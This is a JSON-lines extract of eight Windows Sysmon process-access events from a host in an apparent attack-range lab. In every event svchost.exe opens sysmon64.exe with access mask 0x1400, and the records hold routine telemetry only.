{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5124,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5125,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5126,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:43","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:43.047\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:43.047","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:44","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
